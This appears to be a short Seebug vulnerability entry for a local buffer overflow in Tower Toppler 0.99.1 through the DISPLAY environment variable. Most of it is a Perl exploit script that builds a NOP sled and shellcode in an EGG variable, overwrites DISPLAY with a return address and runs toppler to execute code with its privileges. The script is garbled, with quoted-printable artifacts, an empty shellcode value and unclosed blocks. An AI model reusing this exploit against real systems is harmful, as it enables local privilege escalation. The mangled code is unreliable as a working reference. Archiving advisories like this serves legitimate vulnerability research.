Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability

ID SSV:76140
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


It has been reported that a buffer overflow exists in Tower Toppler. A local user may be able to exploit this issue to execute code with the privileges of the toppler program.

#!/usr/bin/perl playing a game
#hi bob
$len =3D 1024;
$ret =3D 0xbfbffd31;
$nop =3D "\x90";
$offset =3D 0;
$shellcode =3D =

if (@ARGV =3D=3D 1) {
    $offset =3D $ARGV[0];
for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .=3D $nop;
$buffer .=3D $shellcode;

$new_ret =3D pack('l', ($ret + $offset));
for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) {
    $buffer .=3D $new_ret;

local($ENV{'EGG'}) =3D $buffer;=20
local($ENV{'DISPLAY'}) =3D $new_ret x 64;=20

exec("toppler 2>/dev/null");